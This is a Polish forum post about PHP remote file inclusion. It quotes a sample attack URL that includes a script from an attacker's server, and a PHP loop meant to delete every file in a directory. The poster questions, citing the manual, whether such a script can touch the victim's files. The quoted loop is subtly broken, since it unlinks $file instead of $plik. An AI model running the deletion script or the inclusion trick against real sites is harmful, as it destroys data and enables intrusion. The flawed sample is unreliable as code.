LBO -> Przeglądałem podany temat ale teraz zrobie to dogłebnie jeśli mam znaleść tam rozwiązanie...
Ale już pierwsze słowa się nie zgadzają z manualem bo jest pisane w poście
Cytat
"(..)Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres:
http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.phpDajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak:
<?php
$katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany */
while ($plik = readdir($katalog)) {
unlink($file);
} ?>
No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.(..) "
A manual mówi "
Cytat
(..) jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego(..)"
Czyli jedyne co hacker może skasować takim skryptem to katalogi na własnym serverze ? Czyli dalsze sposoby są bezurzyteczne na zablokowanie includowania przez URL. Bo taki gość sobie zainkluduje plik, strona zmienic wygląd ale w żaden sposób nie zmienic zawartośći plików na naszym serverze ?
przykładowo gdzie include($tytul) :
